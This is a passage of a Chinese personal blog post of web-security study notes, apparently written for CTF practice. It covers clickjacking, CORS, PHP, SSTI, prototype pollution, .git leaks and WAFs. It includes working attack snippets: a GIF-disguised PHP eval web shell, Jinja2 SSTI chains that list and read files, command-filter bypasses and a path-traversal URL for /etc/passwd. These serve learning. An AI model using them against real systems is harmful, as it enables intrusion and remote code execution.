<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="1、目标网页隐藏技术"><a href="#1、目标网页隐藏技术" class="headerlink" title="1、目标网页隐藏技术"></a>1、目标网页隐藏技术</h3><p>攻击者在恶意网站上通过 iframe 载入目标网页，隐藏目标网页，欺骗用户点击隐藏的恶意链接。目前主要的网页隐藏技术有两种：CSS隐藏技术和双iframe隐藏技术。<br><strong>CSS 隐藏技术</strong>的原理是利用 CSS 技术控制网页内容显示的效果。其中opacity参数表示元素的透明度，取值范围为0~1，默认值为1表示不透明， 取值为0时元素在网页中完全透明显示。当设置目标 iframe 的opacity 属性小于或等于0.1，用户就无法看到含恶意代码的目标网页。<br><strong>双iframe隐藏</strong>技术使用内联框架和外联框架。内联框架的主要功能是载入目标网页，并将目标网页定位到特定按钮或者链接。外联框架的主要功能是筛选，只显示内联框架中特定的按钮。</p>
<h3 id="2、点击操作劫持"><a href="#2、点击操作劫持" class="headerlink" title="2、点击操作劫持"></a>2、点击操作劫持</h3><p>在成功隐藏目标网页后，攻击者下一个目标是欺骗用户点击特定的按钮，最简单实用的方法是使用社会工程学。例如，将攻击按钮外观设计成类似QQ消息的提示按钮，诱使用户点击从而触发攻击行为。另外一种思路是使用脚本代码以及其他技术增加用户点击特定按钮的概率。主要方法如JavaScript实现鼠标跟随技术、按键劫持 (Stroke jacking) 技术等。</p>
<h3 id="3、拖拽（Drag-and-Drop）技术"><a href="#3、拖拽（Drag-and-Drop）技术" class="headerlink" title="3、拖拽（Drag and Drop）技术"></a>3、拖拽（Drag and Drop）技术</h3><p>主流的浏览器都有drag-and-drop API 接口，供网站开发人员创建交互式网页。但是，这些 API 接口在设计时没有考虑很多的安全性问题，导致通过拖拽就可以实现跨域操作。利用拖拽技术，攻击者可以突破很多已有的安全防御措施，<br>利用拖拽技术，攻击者可以轻易将文本注入到目标网页。在实际实施过程中，攻击者欺骗用户选择输入框的内容，完成拖拽操作。另外一种方式是，通过浏览器的 API 接口将 iframe 中的内容拖拽到目标网页的 text area 中，攻击者就可以获得用户网页中存在的敏感信息。</p>
<h3 id="4、结合CSRF漏洞"><a href="#4、结合CSRF漏洞" class="headerlink" title="4、结合CSRF漏洞"></a>4、结合CSRF漏洞</h3><p>跨站点请求伪造漏洞需要获得正确token值，而Clickjacking可以做到被攻击者在未知的情况下泄露自己的token</p>
<h3 id="5、结合XSS漏洞"><a href="#5、结合XSS漏洞" class="headerlink" title="5、结合XSS漏洞"></a>5、结合XSS漏洞</h3><p>反射型跨站点脚本漏洞是非持久型的漏洞，但通过Clickjacking，就变成了存储型XSS</p>
<h2 id="防御-1"><a href="#防御-1" class="headerlink" title="防御"></a>防御</h2><h3 id="1、FrameBusting代码"><a href="#1、FrameBusting代码" class="headerlink" title="1、FrameBusting代码"></a>1、FrameBusting代码</h3><p>点击劫持攻击需要首先将目标网站载入到恶意网站中，使用 iframe 载入网页是最有效的方法。使用 JavaScript编写的Frame Busting 脚本阻止恶意网站载入网页——如果检测到网页被非法网页载入，就执行自动跳转功能。</p>
<p>如果用户浏览器禁用JavaScript脚本，那么FrameBusting代码也无法正常运行。</p>
<h3 id="2、-X-FRAME-OPTIONS-机制"><a href="#2、-X-FRAME-OPTIONS-机制" class="headerlink" title="2、 X-FRAME-OPTIONS 机制"></a>2、 X-FRAME-OPTIONS 机制</h3><p>部分浏览器支持</p>
<p>该机制有两个选项：DENY 和 SAMEORIGIN。DENY表示任何网页都不能使用 iframe 载入该网页，SAMEORIGIN表示符合同源策略的网页可以使用 iframe载入该网页。</p>
<h3 id="3、Content-Security-Policy"><a href="#3、Content-Security-Policy" class="headerlink" title="3、Content Security Policy"></a>3、Content Security Policy</h3><p>“网页安全政策”（Content Security Policy，缩写 CSP），一种白名单制度。</p>
<h3 id="4、-NoScript-扩展"><a href="#4、-NoScript-扩展" class="headerlink" title="4、 NoScript 扩展"></a>4、 NoScript 扩展</h3><p>Firefox的NoScript扩展</p>
<h1 id="CORS"><a href="#CORS" class="headerlink" title="CORS"></a><h1 id="cors">CORS</h1></h1><p>Cross-origin resource sharing</p>
<p><strong>A01:2021 - Broken Access Control</strong>（访问控制缺陷）</p>
<ul>
<li>如果 CORS 配置不正确，可能允许来自恶意来源的请求访问受限资源，导致未授权的数据泄露或修改。</li>
</ul>
<p><strong>A05:2021 - Security Misconfiguration</strong>（安全配置错误）</p>
<ul>
<li>CORS 配置错误（如不安全的 <code>Access-Control-Allow-Origin</code> 设置）属于安全配置错误的一部分。</li>
</ul>
<h2 id="啥是CORS"><a href="#啥是CORS" class="headerlink" title="啥是CORS"></a>啥是CORS</h2><p>个人理解，出于安全浏览器根据同源安全策略（SOP）限制跨域HTTP请求，但也带来了不便，在此情况下CORS可以绕过SOP使得跨源/跨域访问可以成功</p>
<p><strong>关于同源安全策略</strong></p>
<blockquote>
<p><img src="/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/image-20240529152554853.png" alt="image-20240529152554853"></p>
</blockquote>
<p><strong>两种请求</strong></p>
<p>浏览器将CORS请求分为简单请求和非简单请求。</p>
<p>简单请求为：</p>
<ul>
<li>请求方式为GET，POST，HEAD这三种之一</li>
<li>HTTP头不超出（Accept，Accept-Language，Content-Language，Lat-Event-ID，Content-Type）这几种字段</li>
</ul>
<p>对于简单请求，浏览器会自动在Header里添加Origin,用来说明本次请求来自哪个源（协议 + 域名 + 端口），如果不被许可，那么会收到不包含<code>Access-Control-Allow-Origin</code>的响应（但状态码可能还是200）。</p>
<p>反之会包含</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ccess-Control-Allow-Origin<span class="punctuation">:</span> </span><br><span class="line">Access-Control-Allow-Credentials<span class="punctuation">:</span> </span><br><span class="line">Access-Control-Expose-Headers<span class="punctuation">:</span></span><br></pre></td></tr></table></figure>
<p>其中ccess-Control-Allow-Origin:为必须，表示允许哪个域访问，如果为*则表示全部，这样就引出来了CORS相关的漏洞</p>
<h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h2><h1 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a><h1 id="php">PHP</h1></h1><h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><h3 id="伪协议读取文件"><a href="#伪协议读取文件" class="headerlink" title="伪协议读取文件"></a>伪协议读取文件</h3><p>常见伪协议： <code>php://filter</code>、<code>php://input</code>、<code>php://memory</code></p>
<p>常见格式：<strong>filename=php://filter/read=convert.base64-encode/resource=</strong>（不知道是我见识少了还是刻板印象，这里的read似乎本来就不需要，后面写的绕过其实也是没有用到read的）</p>
<p>相关绕过：convert.base64-encode 是对于编码格式的操作，将读取到的内容以Base64的格式加密，可以替换为<code>convert.quoted-printable-encode、convert.iconv.&lt;input-encoding&gt;.&lt;output-encoding&gt;</code></p>
<p>如：<strong>filename=php://filter/convert.iconv.utf8.utf16/resource=</strong></p>
<h2 id="弱类型比较"><a href="#弱类型比较" class="headerlink" title="弱类型比较"></a>弱类型比较</h2><h3 id="字符串和数字"><a href="#字符串和数字" class="headerlink" title="字符串和数字"></a>字符串和数字</h3><p>’123a‘作为数字进行比较会转换成123，’a123‘，’aaaaa‘则为0</p>
<h3 id="布尔true和任意"><a href="#布尔true和任意" class="headerlink" title="布尔true和任意"></a>布尔true和任意</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">var_dump</span>(True == <span class="number">0</span>);	<span class="comment">//bool(false)</span></span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(True == <span class="string">&#x27;False&#x27;</span>);	<span class="comment">//bool(true)</span></span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(True == <span class="number">2</span>);	<span class="comment">//bool(true)</span></span><br></pre></td></tr></table></figure>
<h2 id="反序列化绕过wakeup"><a href="#反序列化绕过wakeup" class="headerlink" title="反序列化绕过wakeup"></a>反序列化绕过wakeup</h2><blockquote>
<p>PHP反序列化漏洞：执行unserialize()时，先会调用__wakeup()。</p>
<p>当序列化字符串中属性值个数大于属性个数，就会导致反序列化异常，从而跳过__wakeup()。</p>
</blockquote>
<h2 id="user-ini绕过-文件上传漏洞"><a href="#user-ini绕过-文件上传漏洞" class="headerlink" title=".user.ini绕过(文件上传漏洞)"></a>.user.ini绕过(文件上传漏洞)</h2><p>php.ini是php的一个全局配置文件，对整个web服务起作用；.user.ini是用户自定义的php.ini，可以利用来构造后门（比如说用于让php解析某个文件）。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file = &lt;filename&gt; <span class="comment">//包含在文件头</span></span><br><span class="line">auto_append_file = &lt;filename&gt; <span class="comment">//包含在文件尾</span></span><br></pre></td></tr></table></figure>
<h2 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h2><p><strong>cat</strong>可以用more代替</p>
<p>flag（整个单词的绕过）可以用f””lag,f\lag</p>
<p><strong>空格</strong>可以用${IFS}</p>
<p><strong>/</strong>可以用<code>$(printf$&#123;IFS&#125;&quot;\57&quot;)</code>内敛执行输出“/”到字符串中</p>
<p><strong>strstr()</strong>区分大小写，<strong>stristr()</strong>不区分</p>
<p><code>preg_match(&#39;/[oc]:\d+:/i&#39;, $var)</code>, 不允许o:number,c:number出现，用o:+number即可</p>
<p>后缀<code>php</code>的绕过可以用参考此正则绕过<code>/.+\.ph(p[3457]?|t|tml)$/</code>这是apache的正则会自动选择对应的解析器</p>
<p>有些过滤只过滤最后一个<code>.</code>后的php后缀，可以考虑用<code>a.php/.</code>绕过</p>
<h2 id="Thinkphp-v5-x"><a href="#Thinkphp-v5-x" class="headerlink" title="Thinkphp v5.x"></a>Thinkphp v5.x</h2><p>框架的漏洞</p>
<p><a target="_blank" rel="noopener" href="https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection">SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合 (github.com)</a></p>
<h2 id="assert-函数"><a href="#assert-函数" class="headerlink" title="assert()函数"></a>assert()函数</h2><p>这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;</p>
<p>assert ( mixed $assertion [, string $description ] ) : bool</p>
<p><strong>如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。</strong></p>
<p>php用.连接字符串，可以在assert中拼接多个命令</p>
<h2 id="SERVER-‘HTTP-X-FORWARDED-FOR’"><a href="#SERVER-‘HTTP-X-FORWARDED-FOR’" class="headerlink" title="$_SERVER[‘HTTP_X_FORWARDED_FOR’]"></a>$_SERVER[‘HTTP_X_FORWARDED_FOR’]</h2><p>指的是请求报文中X-Forwarded_For的值</p>
<h2 id="preg-replace-e模式漏洞"><a href="#preg-replace-e模式漏洞" class="headerlink" title="preg_replace()  \e模式漏洞"></a>preg_replace()  \e模式漏洞</h2><p><code>mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] )</code></p>
<ul>
<li>$pattern: 要搜索的模式，可以是字符串或一个字符串数组。(开头和结尾需要相同字符用于标识，如<code>\pat\</code>,<code>@pat@</code>)</li>
<li>$replacement: 用于替换的字符串或字符串数组。</li>
<li>$subject: 要搜索替换的目标字符串或字符串数组。</li>
</ul>
<p>该函数有个e模式，即pattern部分为\e结尾，如<code>\pat\e</code>(因为\并不是唯一需求，所以也可以有/e这种，也是一个道理)</p>
<p>简单示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$pattern</span> = <span class="string">&quot;/hack/&quot;</span>;</span><br><span class="line"><span class="variable">$replacement</span> = <span class="string">&quot;system(&#x27;ls&#x27;)&quot;</span>;</span><br><span class="line"><span class="variable">$subject</span> = <span class="string">&quot;hack&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">preg_replace</span>(<span class="variable">$pattern</span>, <span class="variable">$replacement</span>, <span class="variable">$subject</span>);</span><br></pre></td></tr></table></figure>
<h2 id="cURL"><a href="#cURL" class="headerlink" title="cURL"></a>cURL</h2><blockquote>
<p>使用数组提供 post 数据时，CURL 组件大概是为了兼容 @filename 这种上传文件的写法，默认把 content_type 设为了 multipart/form-data。</p>
</blockquote>
<p>呃，不懂，大概就是需要使用@filename去发送（用原本的表单框放filename发送不到结果）</p>
<h2 id="PHP-CGI"><a href="#PHP-CGI" class="headerlink" title="PHP-CGI"></a>PHP-CGI</h2><h1 id="HTTP"><a href="#HTTP" class="headerlink" title="HTTP"></a><h1 id="http">HTTP</h1></h1><p>一点HTTP有关的知识和技巧</p>
<h2 id="XFF"><a href="#XFF" class="headerlink" title="XFF"></a>XFF</h2><p>X-Forwarded-For（XFF）客户端的IP地址</p>
<p>有些不通过XFF来判断，可以考虑X-Real-IP（Nginx 反向代理服务器会添加这个请求头，用来传递客户端的真实 IP 地址。）</p>
<h2 id="Referer"><a href="#Referer" class="headerlink" title="Referer"></a>Referer</h2><p>告诉服务器是从哪个页面链接过来的</p>
<h2 id="Content-Type"><a href="#Content-Type" class="headerlink" title="Content-Type"></a>Content-Type</h2><p>文件上传漏洞中可能遇到类型不对的情况，比如.user.ini后门文件不是jpg可能会被服务端拒绝上传，可能就是检测了此字段，修改即可</p>
<h1 id="Python"><a href="#Python" class="headerlink" title="Python"></a><h1 id="python">Python</h1></h1><h2 id="Python模板注入（SSTI）"><a href="#Python模板注入（SSTI）" class="headerlink" title="Python模板注入（SSTI）"></a>Python模板注入（SSTI）</h2><h3 id="Flask"><a href="#Flask" class="headerlink" title="Flask"></a>Flask</h3><p>Flask是python的一个轻量级Web应用开发框架，适合开发中小应用</p>
<p>Python模板注入简单来说就是python的xss（也许比较狭义）</p>
<h4 id="检测是否存在SSTI"><a href="#检测是否存在SSTI" class="headerlink" title="检测是否存在SSTI"></a>检测是否存在SSTI</h4><blockquote>
<p>在Jinja2模板引擎中，<code>&#123;&#123;&#125;&#125;</code>是变量包裹标识符。<code>&#123;&#123;&#125;&#125;</code>并不仅仅可以传递变量，还可以执行一些简单的表达式。</p>
</blockquote>
<p>那么，传个<code>&#123;&#123;1+1&#125;&#125;</code>如果会返回2，那就表明存在漏洞</p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p><del>通过查看flask中的全局变量，找到父类<type ‘object’>–&gt;寻找子类–&gt;找关于命令执行或者文件操作的模块。（没看懂）</type></del></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/187845.html">从零学习flask模板注入 - FreeBuf网络安全行业门户</a></p>
<p>总之可以用这个来查看全部模块<code>/&#123;&#123;[].__class__.__base__.__subclasses__()&#125;&#125;</code>，然后找到<code>warnings.catch_warnings</code>模块，在里面找到<code>linecache</code>函数，这其中包含os，然后就用<code>import os</code>去xss注入一手了</p>
<p>或者是用<code>&lt;class ‘site._Printer’&gt;</code>进行命令执行<code>&#123;&#123;''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')&#125;&#125;</code>可以查看有哪些文件</p>
<p>再用<code>type file</code>进行读取<code>&#123;&#123;''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()&#125;&#125;</code></p>
<h4 id="读取当前进程的内存内容"><a href="#读取当前进程的内存内容" class="headerlink" title="读取当前进程的内存内容"></a>读取当前进程的内存内容</h4><p><code>/proc/self/mem</code>，但不能直接读取，因为文件中存在着一些无法读取的未被映射区域</p>
<p>要结合<code>/proc/self/maps</code>中的偏移地址进行读取</p>
<p>即将从maps获取到的地址，利用脚本来访问mem</p>
<h4 id="读取全局变量"><a href="#读取全局变量" class="headerlink" title="读取全局变量"></a>读取全局变量</h4><p><code>url_for</code>或者<code>get_flashed_messages</code></p>
<p>如<code>&#123;&#123;url_for.__globals__&#125;&#125;</code></p>
<h3 id="Tornado"><a href="#Tornado" class="headerlink" title="Tornado"></a>Tornado</h3><h4 id="检测是否存在SSTI-1"><a href="#检测是否存在SSTI-1" class="headerlink" title="检测是否存在SSTI"></a>检测是否存在SSTI</h4><p>和Flask那边一样的检测方式，只不过Flask渲染用的是Jinja2,而Tornado这边是render模版</p>
<p><del>也就是传个2，不过做题的时候似乎1+1直接返回500了，改成1*1就正常了，这里有点没搞懂</del>大概是操作符的问题，关于检测，其实直接<code>&#123;&#123;1&#125;&#125;</code>看有没有返回1应该也是一样的</p>
<h4 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>handler.settings可以访问到环境配置的一些信息技巧</p>
<h3 id="技巧-1"><a href="#技巧-1" class="headerlink" title="技巧"></a>技巧</h3><p>绕过（通过<code>request.args.key</code>方式传参）</p>
<p><code>&#123;&#123;''[request.args.a]&#125;&#125;?a=__class__</code></p>
<p>如<code>&#123;&#123;''.__class__.__mro__[2].__subclasses__()[40]('flag.txt').read()&#125;&#125;</code>可以改写成</p>
<p><code>&#123;&#123;''[request.args.a][request.args.b][2][request.args.c]()[40]('flag.txt')[request.args.d]()&#125;&#125;?a=__class__&amp;b=__mro__&amp;c=__subclasses__&amp;d=read</code></p>
<h2 id="python沙箱逃逸"><a href="#python沙箱逃逸" class="headerlink" title="python沙箱逃逸"></a>python沙箱逃逸</h2><h2 id="Django"><a href="#Django" class="headerlink" title="Django"></a>Django</h2><h2 id="爬虫"><a href="#爬虫" class="headerlink" title="爬虫"></a>爬虫</h2><p>到时候扔个仓库吧，如果爬了啥扔个源码过去。</p>
<h2 id="Tools"><a href="#Tools" class="headerlink" title="Tools"></a>Tools</h2><h3 id="伪造session"><a href="#伪造session" class="headerlink" title="伪造session"></a>伪造session</h3><p><a target="_blank" rel="noopener" href="https://github.com/noraj/flask-session-cookie-manager?spm=a2c6h.12873639.article-detail.8.682492b9E3KdF9">noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder (github.com)</a></p>
<p><code>python flask_session_cookie_manager3.py decode -s “secret_key” -c “session”</code><br><code>python flask_session_cookie_manager3.py encode -s “secret_key” -t “data”</code></p>
<h1 id="JavaScript"><a href="#JavaScript" class="headerlink" title="JavaScript"></a><h1 id="js">JavaScript</h1></h1><h2 id="JavaScript-原型链污染"><a href="#JavaScript-原型链污染" class="headerlink" title="JavaScript 原型链污染"></a>JavaScript 原型链污染</h2><h3 id="什么是原型（JavaScript-原型链继承）"><a href="#什么是原型（JavaScript-原型链继承）" class="headerlink" title="什么是原型（JavaScript 原型链继承）"></a>什么是原型（JavaScript 原型链继承）</h3><ul>
<li><code>prototype</code>是一个类的属性，所有类对象在实例化的时候将会拥有prototype中的属性和方法</li>
<li>一个对象的<code>__proto__</code>属性，指向这个对象所在的类的prototype属性</li>
</ul>
<p>借图</p>
<p><img src="/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/relatation.png" alt="img"></p>
<h3 id="原型链污染原理"><a href="#原型链污染原理" class="headerlink" title="原型链污染原理"></a>原型链污染原理</h3><p>实例化的对象的 <code>.__proto__</code> 指向类的 <code>prototype</code></p>
<p>修改实例化的对象的 <code>.__proto__</code> 的内容, 类的 <code>prototype</code> 的内容会随之发生变化</p>
<p>这就是原型链污染的原理与利用方法。</p>
<h3 id="可污染情况"><a href="#可污染情况" class="headerlink" title="可污染情况"></a>可污染情况</h3><p>能够控制数组（对象）的“键名”的操作</p>
<p>比如merge，clone，Object.assign</p>
<blockquote>
<p>Object.assign({}, a,b)，可以合并a、b到{}中</p>
</blockquote>
<h1 id="Go"><a href="#Go" class="headerlink" title="Go"></a><h1 id="go">Go</h1></h1><h2 id="text-template-SSTI"><a href="#text-template-SSTI" class="headerlink" title="text/template (SSTI)"></a>text/template (SSTI)</h2><p><code>text/template</code>存在SSTI（但go的ssti并不能直接rce和读文件），对 XSS 或任何类型的 HTML 编码都没有保护</p>
<p><code>tmpl.Execute(c.Writer, c);</code>这是一句对tmpl的执行并生成响应，存在模板注入</p>
<p>测试payload如下</p>
<p><code>&#123;&#123;println 0B10101&#125;&#125;</code>回显为21，表明存在SSTI</p>
<h3 id="技巧-2"><a href="#技巧-2" class="headerlink" title="技巧"></a>技巧</h3><p>通过调用Query函数拼接的方式绕过对一些关键字的限制</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;.Query <span class="string">`crumbling`</span>&#125;&#125;&amp;crumbling=&lt;script&gt;alert(<span class="string">&#x27;114514&#x27;</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<h1 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a><h1 id="linux">Linux</h1></h1><p><code>/proc/self/cmdline</code>，用于获取当前启动进程的完整命令。</p>
<h1 id="Git"><a href="#Git" class="headerlink" title="Git"></a><h1 id="git">Git</h1></h1><h2 id="git源码泄露"><a href="#git源码泄露" class="headerlink" title=".git源码泄露"></a>.git源码泄露</h2><h3 id="检测"><a href="#检测" class="headerlink" title="检测"></a>检测</h3><p>/.git进去看看就知道了</p>
<h3 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h3><p>利用githack可以将整个.git的备份获取</p>
<h1 id="安全设备"><a href="#安全设备" class="headerlink" title="安全设备"></a><h1 id="aqsb">安全设备</h1></h1><h2 id="WAF"><a href="#WAF" class="headerlink" title="WAF"></a>WAF</h2><p>WAF（Web Application Firewall，Web应用防火墙）,主要是利用针对HTTP和HTTPS的安全策略来加固应用</p>
<h3 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h3><p><strong>云WAF</strong>，DNS技术，用户的请求会先经过云端节点进行检测。如阿里云盾等。</p>
<p><strong>硬件WAF</strong>,部署在Web服务器前，过滤全部外部访问流量并解析，如绿盟Web应用防火墙</p>
<p><strong>软件WAF</strong>，安装在被防护的服务器上，通过监听端口等方式，如安全狗</p>
<p>大致结构：请求-&gt;云WAF-&gt;硬件WAF-&gt;软件WAF(服务器区)/用户区</p>
<h3 id="保护方式"><a href="#保护方式" class="headerlink" title="保护方式"></a>保护方式</h3><p>常用的方法有关键字检测、正则表达式检测、语法分析、行为分析、声誉分析、机器学习等。</p>
<ul>
<li><strong>正则表达式检测</strong>，简单，常见</li>
<li><strong>语法分析</strong>，快且准确，原理是将payload转化成符号组，在里面寻找危险关键字</li>
<li><strong>行为分析</strong>，主要是针对攻击者的端口扫描、目录爆破、参数测试等行为的检测</li>
<li><strong>声誉分析</strong>，主要是对来源的过滤，如匿名代理、僵尸网络节点的IP等</li>
<li><strong>黑白名单</strong>，黑名单主要针对已知问题，白名单针对比较稳定的Web应用</li>
</ul>
<h3 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式"></a>绕过方式</h3><ul>
<li><strong>基于资源</strong>，通过数据较大的资源去耗尽WAF的计算资源，让WAF无法检测全部数据以逃逸攻击内容</li>
<li><strong>基于架构</strong></li>
<li><strong>基于规则</strong></li>
<li><strong>基于解析</strong></li>
<li><strong>各种特性</strong></li>
</ul>
<h2 id="RASP"><a href="#RASP" class="headerlink" title="RASP"></a>RASP</h2><p>看java安全那个看到的一个东西，先记下之后看看是啥。</p>
<h1 id="Other"><a href="#Other" class="headerlink" title="Other"></a><h1 id="other">Other</h1></h1><h2 id="robots-txt"><a href="#robots-txt" class="headerlink" title="robots.txt"></a>robots.txt</h2><blockquote>
<p>robots.txt是一种文本文件，<strong>用于告知搜索引擎爬虫哪些页面可以被抓取、哪些页面不应被抓取</strong>。通常，网站管理员会在网站的根目录下放置一个名为robots.txt的文件，并使用该文件指定他们希望搜索引擎索引和不索引的页面。</p>
</blockquote>
<p>通过此文件，有时候可以观察到目录结构，进而发现flag的位置</p>
<h2 id="GIF89a"><a href="#GIF89a" class="headerlink" title="GIF89a"></a>GIF89a</h2><p>用于伪造GIF文件</p>
<p>如以下伪造成图片的txt文件内容：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">&lt;?php @eval($_POST[cmd]);?&gt;</span><br></pre></td></tr></table></figure>
<h2 id="AntSword的使用"><a href="#AntSword的使用" class="headerlink" title="AntSword的使用"></a>AntSword的使用</h2><p>官方文档</p>
<p><a target="_blank" rel="noopener" href="https://www.yuque.com/antswordproject/antsword">AntSword 文档 (yuque.com)</a></p>
<h2 id="任意文件读取漏洞"><a href="#任意文件读取漏洞" class="headerlink" title="任意文件读取漏洞"></a>任意文件读取漏洞</h2><h3 id="检测-1"><a href="#检测-1" class="headerlink" title="检测"></a>检测</h3><p>Linux下都有的文件/etc/passwd</p>
<p><code>http://61.147.171.105:56426/info?file=../../etc/passwd</code></p>
<h2 id="Fuzz-模糊测试"><a href="#Fuzz-模糊测试" class="headerlink" title="Fuzz(模糊测试)"></a>Fuzz(模糊测试)</h2><h2 id="Mysql的弱类型？"><a href="#Mysql的弱类型？" class="headerlink" title="Mysql的弱类型？"></a>Mysql的弱类型？</h2><p>简单来说就是where id = ‘1a9’和where id = ‘1’是一个结果。</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a><h1 id="0">参考</h1></h1><p>可能会漏掉一些参考((</p>
<p>先私密马赛为敬</p>
<p><a target="_blank" rel="noopener" href="https://www.freecodecamp.org/chinese/news/what-is-cross-site-request-forgery/#:~:text=跨站点请求伪造（Cross Site Request,Forgery）又被称作 CSRF，是恶意站点或程序通过已认证用户的浏览器在受信任站点上执行非正常操作。 可进行的恶意操作局限于已在网站通过身份验证的用户的功能。">跨站请求伪造——什么是 CSRF 攻击以及如何预防它 (freecodecamp.org)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43378996/article/details/123910614">CSRF漏洞原理攻击与防御（非常细）-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://developer.baidu.com/article/details/3149888">CSRF攻击与防御：深入浅出的解析与实践-百度开发者中心 (baidu.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1516375">点击劫持（ClickJacking）漏洞挖掘及实战案例全汇总-腾讯云开发者社区-腾讯云 (tencent.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/Security/Same-origin_policy">浏览器的同源策略 - Web 安全 | MDN (mozilla.org)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html">深入理解 JavaScript Prototype 污染攻击 | 离别歌 (leavesongs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/282240.html">web安全 | 浅谈安全设备 - FreeBuf网络安全行业门户</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/336869.html">【深蓝实验室天魁战队】WAF的识别、检测、绕过原理与实战案例 - FreeBuf网络安全行业门户</a></p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2024/05/27/Portswigger%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/"
      title="PortSwigger靶场记录"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        PortSwigger靶场记录
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2023/12/20/%E5%BC%BA%E7%BD%91%E6%9D%AF2023-crypto-%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/"
      title="强网杯2023-crypto-部分复现"
     >

    <p class="title-text">
      
        强网杯2023-crypto-部分复现
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2024 crumbling<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn hide" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.classList.remove('hide')
        } else {
            btn.classList.add('hide')
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
